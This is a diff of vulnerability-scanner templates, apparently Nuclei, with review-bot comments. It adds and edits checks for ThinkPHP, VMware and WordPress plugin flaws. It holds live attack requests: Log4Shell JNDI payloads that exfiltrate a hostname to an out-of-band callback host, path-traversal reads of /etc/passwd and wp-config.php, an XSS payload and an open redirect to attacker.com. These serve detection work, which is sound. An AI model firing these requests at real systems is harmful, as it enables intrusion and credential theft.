@@ -7,7 +7,7 @@ info: description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution. reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce tags: thinkphp,rce - + requests: - method: GET path: diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml index 605df4bb17..5d6b6a2362 100644 --- a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml @@ -1,5 +1,5 @@ id: thinkphp-5022-rce - + info: name: ThinkPHP 5.0.22 RCE author: dr_set @@ -7,7 +7,7 @@ info: description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default). reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce tags: thinkphp,rce - + requests: - method: GET path: diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml index 952c9ed7b9..1cda70e12f 100644 --- a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml @@ -1,5 +1,5 @@ id: thinkphp-5023-rce - + info: name: ThinkPHP 5.0.23 RCE author: dr_set @@ -7,7 +7,7 @@ info: description: Thinkphp5 5.0(<5.0.24) Remote Code Execution. reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5.0.23-rce tags: thinkphp,rce - + requests: - method: POST path: diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml index fe3e3f715e..e1fd12a08d 100644 --- a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml +++ b/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml 
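Review bot: `reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce` in `thinkphp-2-rce` stays a plain scalar in the context lines while nearly every other template in this diff converts `reference` to a list; this whitespace-only hunk is the natural place to normalise it to `reference:` followed by `- https://...`. The same scalar form remains in `thinkphp-5022-rce`, `thinkphp-5023-rce` and `alfacgiapi-wordpress`.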
@@ -1,26 +1,29 @@ -id: thinkphp-509-information-disclosure - -info: - name: ThinkPHP 5.0.9 Information Disclosure - author: dr_set - severity: critical - description: Verbose SQL error message reveals sensitive information including database credentials. - reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection - tags: thinkphp - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" - - matchers-condition: and - matchers: - - type: word - condition: and - words: - - "SQLSTATE" - - "XPATH syntax error" - - - type: status - status: - - 500 +id: thinkphp-509-information-disclosure + +info: + name: ThinkPHP 5.0.9 - Information Disclosure + author: dr_set + severity: critical + description: ThinkPHP 5.0.9 includes verbose SQL error message that can reveal sensitive information including database credentials. + reference: + - https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/in-sqlinjection + tags: thinkphp + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - "SQLSTATE" + - "XPATH syntax error" + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/04/20 diff --git a/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml b/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..ac05387a0c --- /dev/null +++ b/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml 
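Review bot: Every line of `thinkphp-509-information-disclosure.yaml` is removed and re-added although only `name`, `description` and `reference` actually change, which suggests a line-ending conversion rather than an edit; if so, a `* text=auto` rule in `.gitattributes` would stop whole-file diffs from hiding the real changes. The new `description` is fine, but it may be worth confirming that the rewritten file keeps the same encoding as its neighbours so the next touch does not flip it back.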
@@ -0,0 +1,37 @@ +id: vmware-horizon-log4j-jndi-rce + +info: + name: VMware Horizon Log4j JNDI RCE + author: johnk3r + severity: high + description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon. + reference: + - https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis + - https://www.vmware.com/security/advisories/VMSA-2021-0028.html + tags: rce,jndi,log4j,horizon,vmware + +requests: + - raw: + - | + GET /portal/info.jsp HTTP/1.1 + Host: {{Hostname}} + Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml index 60b28b1a65..a6ab46dae7 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml @@ -4,7 +4,7 @@ info: name: Vmware Vcenter LFI for Linux appliances author: PR3R00T severity: high - tags: vmware,lfi + tags: vmware,lfi,vcenter requests: - method: GET @@ -13,4 +13,4 @@ requests: matchers: - type: word words: - - "vCenter Server" \ No newline at end of file + - "vCenter Server" diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml index 9ee7ce40bb..53a04713d1 100644 --- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml 
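Review bot: `severity: high` in `vmware-horizon-log4j-jndi-rce` is inconsistent with the other Log4Shell templates added in this diff, `springboot-log4j-rce` and `vrealize-operations-log4j-rce`, which are `critical` and carry a `classification` block for the same CVE-2021-44228 that the description names. The advisory it references, VMSA-2021-0028, covers that issue, so `severity: critical` plus `classification:` with `cve-id: CVE-2021-44228` would keep the rating consistent; `vmware-vcenter-log4j-jndi-rce` further down has the same gap.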
@@ -7,7 +7,7 @@ info: reference: - https://kb.vmware.com/s/article/7960893 - https://twitter.com/ptswarm/status/1316016337550938122 - tags: vmware,lfi + tags: vmware,lfi,vcenter requests: - raw: diff --git a/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..b231e287be --- /dev/null +++ b/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml @@ -0,0 +1,38 @@ +id: vmware-vcenter-log4j-jndi-rce + +info: + name: VMware VCenter Log4j JNDI RCE + author: _0xf4n9x_ + severity: high + description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter. + reference: + - https://www.vmware.com/security/advisories/VMSA-2021-0028.html + - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + - https://twitter.com/tnpitsecurity/status/1469429810216771589 + tags: rce,jndi,log4j,vcenter,vmware + +requests: + - raw: + - | + GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output \ No newline at end of file diff --git a/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml b/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml index a5c3a08d86..9ee9d70874 100644 --- a/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml +++ b/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml 
@@ -4,8 +4,9 @@ info: name: VMware vCenter SSRF/LFI/XSS author: pdteam severity: critical - reference: https://github.com/l0ggg/VMware_vCenter - tags: ssrf,lfi,xss,oast + reference: + - https://github.com/l0ggg/VMware_vCenter + tags: ssrf,lfi,xss,oast,vcenter,vmware requests: - method: GET diff --git a/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml new file mode 100644 index 0000000000..166fd6a2a0 --- /dev/null +++ b/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml 
@@ -0,0 +1,49 @@ +id: vrealize-operations-log4j-rce + +info: + name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution + author: bughuntersurya + severity: critical + description: VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application. + reference: + - https://www.vmware.com/security/advisories/VMSA-2021-0028.html + - https://core.vmware.com/vmsa-2021-0028-questions-answers-faq + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + - https://nvd.nist.gov/vuln/detail/CVE-2021-45046 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + metadata: + shodan-query: http.title:"vRealize Operations Tenant App" + tags: rce,log4j,vmware,vrealize + +requests: + - raw: + - | + POST /suite-api/api/auth/token/acquire HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Origin: {{RootURL}} + Referer: {{RootURL}}/ui/ + + {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"} + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" # Confirms the DNS Interaction + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + +# Enhanced by mp on 2022/04/05 diff --git a/vulnerabilities/wordpress/accessibility-helper-xss.yaml b/vulnerabilities/wordpress/accessibility-helper-xss.yaml new file mode 100644 index 0000000000..e1b5a6ec3a --- /dev/null +++ b/vulnerabilities/wordpress/accessibility-helper-xss.yaml 
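Review bot: The `classification` block in `vrealize-operations-log4j-rce` has `cvss-metrics` but neither `cvss-score` nor `cve-id`, although the references point at CVE-2021-44228 and CVE-2021-45046 and `springboot-log4j-rce` in this diff carries `cvss-score: 10.0` and `cve-id: CVE-2021-44228`; adding those two lines makes the template filterable by CVE like its sibling. The `# Confirms the DNS Interaction` comment also sits on the `- "dns"` line here but on the `part:` line in the other three Log4j templates, a small inconsistency worth aligning.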
@@ -0,0 +1,31 @@ +id: accessibility-helper-xss + +info: + name: WP Accessibility Helper (WAH) < 0.6.0.7 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDK + severity: medium + description: The plugin does not sanitise and escape the wahi parameter before outputting back its base64 decode value in the page, leading to a Reflected Cross-Site Scripting issue. + reference: + - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5 + tags: xss,wordpress,wp-plugin,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var wah_target_src = '';alert(document.domain);//';" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml new file mode 100644 index 0000000000..fd86eaf40f --- /dev/null +++ b/vulnerabilities/wordpress/admin-word-count-column-lfi.yaml @@ -0,0 +1,25 @@ +id: admin-word-count-column-lfi + +info: + name: Admin word count column 2.2 - Arbitrary File Retrieval + author: daffainfo,Splint3r7 + severity: high + reference: + - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html + - https://wordpress.org/plugins/admin-word-count-column/ + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/age-gate-open-redirect.yaml b/vulnerabilities/wordpress/age-gate-open-redirect.yaml new file mode 100644 index 0000000000..2c70de7696 --- /dev/null 
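Review bot: The request path in `admin-word-count-column-lfi` ends in `\0` inside a single-quoted YAML scalar, where backslash escapes are not processed, so the request carries the two literal characters `\` and `0`; `cab-fare-calculator-lfi` in this same diff writes the equivalent as `%00`. Confirm against the referenced advisory which form is intended and use one encoding in both templates. The template also lacks a `description`, which `accessibility-helper-xss` directly above provides.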
+++ b/vulnerabilities/wordpress/age-gate-open-redirect.yaml @@ -0,0 +1,29 @@ +id: age-gate-open-redirect + +info: + name: Age Gate < 2.13.5 - Unauthenticated Open Redirect + author: akincibor + severity: low + description: The plugin takes the _wp_http_referer parameter to redirect users after some actions as well as after invalid or missing nonces, leading to an Unauthenticated Open Redirect issue. + reference: + - https://wpscan.com/vulnerability/10489 + - https://packetstormsecurity.com/files/160236/ + - https://wordpress.org/plugins/age-gate + metadata: + verified: true + tags: wp-plugin,redirect,wordpress,wp,agegate,unauth + +requests: + - method: POST + path: + - '{{BaseURL}}/wp-admin/admin-post.php' + + body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com + headers: + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml b/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml index 69b0d39f88..27d4456e69 100644 --- a/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml +++ b/vulnerabilities/wordpress/alfacgiapi-wordpress.yaml @@ -1,4 +1,5 @@ id: alfacgiapi-wordpress + info: name: alfacgiapi author: pussycat0x @@ -6,6 +7,7 @@ info: description: Searches for sensitive directories present in the ALFA_DATA. reference: https://www.exploit-db.com/ghdb/6999 tags: wordpress,listing + requests: - method: GET path: diff --git a/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml b/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml new file mode 100644 index 0000000000..f9fc49bd56 --- /dev/null 
+++ b/vulnerabilities/wordpress/amministrazione-aperta-lfi.yaml @@ -0,0 +1,25 @@ +id: amministrazione-aperta-lfi + +info: + name: Amministrazione Aperta 3.7.3 - Unauthenticated Local File Read + author: daffainfo,Splint3r7 + severity: high + reference: + - https://www.exploit-db.com/exploits/50838 + - https://wordpress.org/plugins/amministrazione-aperta + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/aspose-file-download.yaml b/vulnerabilities/wordpress/aspose-file-download.yaml index 78d4048c1b..2c4b91c5d4 100644 --- a/vulnerabilities/wordpress/aspose-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-file-download.yaml @@ -1,12 +1,13 @@ id: aspose-file-download info: - name: Aspose Cloud eBook Generator - File Download + name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. - reference: https://wpscan.com/vulnerability/7866 - tags: wordpress,wp-plugin,lfi + description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability. + reference: + - https://wpscan.com/vulnerability/7866 + tags: wordpress,wp-plugin,lfi,aspose,ebook requests: - method: GET diff --git a/vulnerabilities/wordpress/aspose-ie-file-download.yaml b/vulnerabilities/wordpress/aspose-ie-file-download.yaml index 095211f5e4..ae52c36233 100644 --- a/vulnerabilities/wordpress/aspose-ie-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml 
@@ -1,10 +1,10 @@ id: aspose-ie-file-download info: - name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter diff --git a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml index 338fb37c0d..48c499bc3a 100644 --- a/vulnerabilities/wordpress/aspose-pdf-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-pdf-file-download.yaml @@ -1,10 +1,10 @@ id: aspose-pdf-file-download info: - name: WordPress Aspose PDF Exporter File Download + name: WordPress Aspose PDF Exporter - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.psf Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.psf Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. reference: - https://packetstormsecurity.com/files/131161 - https://wordpress.org/plugins/aspose-pdf-exporter diff --git a/vulnerabilities/wordpress/aspose-words-file-download.yaml b/vulnerabilities/wordpress/aspose-words-file-download.yaml index 6cf04ee7eb..ac80fecb8c 100644 --- a/vulnerabilities/wordpress/aspose-words-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-words-file-download.yaml 
@@ -1,14 +1,14 @@ id: aspose-words-file-download info: - name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download + name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. reference: - https://wpscan.com/vulnerability/7869 - https://wordpress.org/plugins/aspose-doc-exporter - tags: wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,aspose requests: - method: GET diff --git a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml index 27dc936559..3dbd07b8b7 100644 --- a/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml +++ b/vulnerabilities/wordpress/attitude-theme-open-redirect.yaml @@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. - reference: https://cxsecurity.com/issue/WLB-2020030185 + reference: + - https://cxsecurity.com/issue/WLB-2020030185 tags: wordpress,wp-theme,redirect requests: diff --git a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml index ddc524d0fc..826c966731 100644 --- a/vulnerabilities/wordpress/brandfolder-open-redirect.yaml +++ b/vulnerabilities/wordpress/brandfolder-open-redirect.yaml 
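Review bot: The new aspose-words description ends in `arbitrary file retrieval security vulnerability`, whereas the parallel rewrites of the other three Aspose templates in this commit all end in `arbitrary file retrieval vulnerability`; dropping `security` keeps the four descriptions in step. The attitude-theme hunk on this line only converts the reference to a list.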
@@ -5,7 +5,8 @@ info: author: 0x_Akoko severity: low description: A vulnerability in WordPress Brandfolder allows remote attackers to inject an arbitrary URL into the 'callback.php' endpoint via the 'wp_abspath' parameter which will redirect the victim to it. - reference: https://www.exploit-db.com/exploits/39591 + reference: + - https://www.exploit-db.com/exploits/39591 tags: wordpress,wp-plugin,lfi,rfi requests: diff --git a/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml b/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml new file mode 100644 index 0000000000..a668258b91 --- /dev/null +++ b/vulnerabilities/wordpress/cab-fare-calculator-lfi.yaml @@ -0,0 +1,25 @@ +id: cab-fare-calculator-lfi + +info: + name: Cab fare calculator 1.0.3 - Unauthenticated Local File Inclusion + author: Hassan Khan Yusufzai - Splint3r7 + severity: high + reference: + - https://www.exploit-db.com/exploits/50843 + - https://wordpress.org/plugins/cab-fare-calculator + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/candidate-application-lfi.yaml b/vulnerabilities/wordpress/candidate-application-lfi.yaml new file mode 100644 index 0000000000..cdc97aa53a --- /dev/null +++ b/vulnerabilities/wordpress/candidate-application-lfi.yaml 
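Review bot: The brandfolder context line `tags: wordpress,wp-plugin,lfi,rfi` does not fit a template whose id and description describe an open redirect; converting the reference right above it was the chance to change it to `tags: wordpress,wp-plugin,redirect` so the template is selected together with the other redirect checks. The mismatch predates this commit, which only touches the reference list. The new cab-fare-calculator-lfi template on this line, like amministrazione-aperta-lfi, has no `description` or `classification` block, unlike the `cwe-id: CWE-22` templates added in the same commit.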
@@ -0,0 +1,31 @@ +id: candidate-application-lfi + +info: + name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion + author: dhiyaneshDK + severity: high + description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks. + reference: + - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/vulnerabilities/wordpress/cherry-file-download.yaml b/vulnerabilities/wordpress/cherry-file-download.yaml index 3597e4d780..8ebd3cd3c1 100644 --- a/vulnerabilities/wordpress/cherry-file-download.yaml +++ b/vulnerabilities/wordpress/cherry-file-download.yaml 
@@ -1,13 +1,17 @@ id: cherry-file-download info: - name: Cherry Plugin < 1.2.7 - Unauthenticated Arbitrary File Download + name: Cherry Plugin < 1.2.7 - Arbitrary File Retrieval and File Upload author: 0x_Akoko severity: high - description: The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. + description: WordPress plugin Cherry < 1.2.7 contains an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file. reference: - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee - https://github.com/CherryFramework/cherry-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi requests: @@ -27,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/vulnerabilities/wordpress/cherry-lfi.yaml b/vulnerabilities/wordpress/cherry-lfi.yaml new file mode 100644 index 0000000000..b0b6c0a44f --- /dev/null +++ b/vulnerabilities/wordpress/cherry-lfi.yaml 
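Review bot: The added classification lists only `cwe-id: CWE-22` with an impact vector of `C:H/I:N/A:N`, while the new name `Arbitrary File Retrieval and File Upload` and the description say the plugin also accepts arbitrary uploads; if the upload half is meant to be represented, the classification should say so (an integrity impact and the upload CWE), otherwise the name should stay limited to the retrieval the template exercises. The request lines are outside this hunk, so which of the two the template actually tests cannot be confirmed from here.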
@@ -0,0 +1,36 @@ +id: cherry-lfi + +info: + name: WordPress Cherry < 1.2.7 - Unauthenticated Arbitrary File Upload and Download + author: dhiyaneshDK + severity: high + description: WordPress plugin Cherry < 1.2.7 has a vulnerability which enables an attacker to upload files directly to the server. This could result in attacker uploading backdoor shell scripts or downloading the + wp-config.php file. + reference: + - https://wpscan.com/vulnerability/90034817-dee7-40c9-80a2-1f1cd1d033ee + - https://support.alertlogic.com/hc/en-us/articles/115003048083-06-19-17-WordPress-CMS-Cherry-Plugin-Arbitrary-File-Upload-RCE + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/21 diff --git a/vulnerabilities/wordpress/churchope-lfi.yaml b/vulnerabilities/wordpress/churchope-lfi.yaml new file mode 100644 index 0000000000..a0f1465b83 --- /dev/null +++ b/vulnerabilities/wordpress/churchope-lfi.yaml 
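Review bot: This new template cites the same wpscan advisory (`90034817-dee7-40c9-80a2-1f1cd1d033ee`) as the existing cherry-file-download.yaml edited on L891, so a vulnerable host would be reported twice for one issue; drop one of the two, or reduce this one to whatever the other does not already check. The name claims `Unauthenticated Arbitrary File Upload and Download`, yet the only request is a GET for `wp-config.php` through `download-content.php`, so the upload half is not tested and the name overstates coverage. The wrapped plain scalar in `description` (the line ending in `downloading the` continued by ` wp-config.php file.`) folds into one string but reads more clearly as a `description: >-` block.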
@@ -0,0 +1,32 @@ +id: churchope-lfi + +info: + name: WordPress ChurcHope Theme <= 2.1 - Local File Inclusion + author: dhiyaneshDK + severity: high + description: WordPress ChurcHope Theme <= 2.1 is susceptible to local file inclusion. The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible. + reference: + - https://wpscan.com/vulnerability/3c5833bd-1fe0-4eba-97aa-7d3a0c8fda15 + classification: + cwe-id: CWE-22 + tags: wordpress,wp-theme,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/12 diff --git a/vulnerabilities/wordpress/db-backup-lfi.yaml b/vulnerabilities/wordpress/db-backup-lfi.yaml new file mode 100644 index 0000000000..48dcb57edf --- /dev/null +++ b/vulnerabilities/wordpress/db-backup-lfi.yaml 
@@ -0,0 +1,30 @@ +id: db-backup-lfi + +info: + name: DB Backup <= 4.5 - Path Traversal File Access + author: dhiyaneshDK + severity: high + description: WordPress Plugin DB Backup is prone to a directory traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive + information that could aid in further attacks. WordPress Plugin DB Backup version 4.5 is vulnerable; prior versions may also be affected. + reference: + - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536 + - https://www.exploit-db.com/exploits/35378 + tags: wordpress,wp-plugin,lfi,wp + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DB_NAME" + - "DB_PASSWORD" + condition: and + + - type: status + status: + - 200 diff --git a/vulnerabilities/wordpress/diarise-theme-lfi.yaml b/vulnerabilities/wordpress/diarise-theme-lfi.yaml index ac34aa0c88..366df9bb91 100644 --- a/vulnerabilities/wordpress/diarise-theme-lfi.yaml +++ b/vulnerabilities/wordpress/diarise-theme-lfi.yaml @@ -1,12 +1,16 @@ id: diarise-theme-lfi + info: - name: WordPress Diarise 1.5.9 Local File Disclosure + name: WordPress Diarise 1.5.9 - Arbitrary File Retrieval author: 0x_Akoko severity: high - description: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure vulnerability. + description: WordPress Diarise theme version 